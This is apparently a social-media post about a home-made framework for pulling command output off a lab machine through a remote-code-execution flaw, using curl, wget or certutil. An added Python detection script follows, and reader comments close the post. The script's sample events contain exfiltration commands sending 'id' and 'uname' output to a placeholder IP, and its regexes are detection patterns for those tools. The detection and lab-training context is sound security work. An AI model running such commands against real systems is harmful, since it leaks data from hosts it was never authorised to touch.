RCE Exfiltration Framework?
So I got tired of running into boxes, finding RCE vulnerabilities, but not being able to establish a shell. But wait... we do have RCE, right?
It started with a Proving Grounds box called Exghost, which was found to be vulnerable to CVE-2021-22204, allowing us to achieve RCE by crafting a JPEG with malicious metadata and sending it to a webserver.
Of course, after this you would want to get a reverse shell, right?
After trying a few reverse shell payloads, I thought to myself: why go through all this trouble to find a shell when I already had RCE?
Exfiltration Using RCE Exfiltration Framework
The code is available on github: https://github.com/yerodin/RCE-Exfiltration-Framwework
The Basic Idea
Hmm... so first we need to create a Python module with a function called my_rce_function(cmd) that triggers the RCE.
Below I created a module called exghost_rce to trigger the RCE and run a specific command.
Next, I ran the script, telling it to exfiltrate the data using curl and passing the module name as an argument.
Voila! We were able to simulate a shell!
After doing some exfiltration with the framework, I was able to determine that the system had python3. This allowed me to easily figure out what payload I needed to send to catch a shell and gain a stronger foothold on the target, way faster than throwing a bunch of commands and hoping for the best.
Of course, right now we are basically only doing reverse HTTP with a few commands like curl, certutil and wget, but there are many creative ways to exfiltrate data, even through ping! Check out ptunnel.
I can't count the number of times I ran into a box where I spent hours trying to get a shell, so I do see this being a useful tool.
Currently it's just a POC, but I plan to continue working on this in my spare time. Feel free to send a pull request!
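The flip side of the technique described above, from the detection seat: the framework's pattern is a web-server worker spawning curl, wget or certutil and feeding command output into an outbound request. The following is an added example, not code from the post or the framework; it triages constructed process-creation events (the `ProcEvent` fields and the sample records are assumptions) and flags the ones that match that pattern.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Transfer tools the post names for pulling command output off the box.
TOOL_RE = re.compile(r"\b(curl|wget|certutil)(?:\.exe)?\b", re.IGNORECASE)
# Outbound URL on the command line.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Command output stuffed into the request: $(...), backticks, stdin via -d @-, or a pipe.
FEED_RE = re.compile(r"\$\(|`|(?:-d|--data(?:-binary)?)\s*@-|\|\s*(?:curl|wget)\b")
# Web-tier parents and users that should not be launching download tools in normal operation.
WEB_PARENTS = {"httpd", "apache2", "nginx", "php-fpm", "w3wp.exe"}
WEB_USERS = {"www-data", "apache", "nginx"}

@dataclass
class ProcEvent:
    """One process-creation record: parent image, effective user, full command line."""
    parent: str
    user: str
    cmdline: str

def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons this event resembles RCE-driven exfiltration; [] if benign."""
    tool = TOOL_RE.search(ev.cmdline)
    web_ctx = ev.parent.lower() in WEB_PARENTS or ev.user.lower() in WEB_USERS
    if not (tool and web_ctx):
        return []  # transfer tools run from cron or an admin shell are business as usual
    reasons = [f"{ev.parent} ({ev.user}) spawned {tool.group(1).lower()}"]
    if URL_RE.search(ev.cmdline):
        reasons.append("outbound URL on command line")
    if FEED_RE.search(ev.cmdline):
        reasons.append("command output fed into request")
    return reasons

def triage(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that deserves a human look."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append((i, reasons))
    return hits

# Constructed sample events (not real telemetry); 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    ProcEvent("apache2", "www-data", "sh -c 'curl -s -d \"$(id)\" http://203.0.113.5:8080/out'"),
    ProcEvent("cron", "root", "wget -q https://mirror.example.net/updates.tar.gz"),
    ProcEvent("nginx", "www-data", "sh -c 'uname -a | curl -d @- http://203.0.113.5:8080/out'"),
    ProcEvent("apache2", "www-data", "php-fpm: pool www"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
```

The rule keys on parent/user context rather than on the tool alone, so routine downloads by cron or an administrator do not alert; the ICMP variant the post mentions needs a separate network-side check.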
Let me know what you guys think! All suggestions are welcome :)
Security Engineer
2 years
Amazing concept, removes a lot of guesswork for sure.
Computer Scientist | Security Researcher
2 years
Added the github repo https://github.com/yerodin/RCE-Exfiltration-Framwework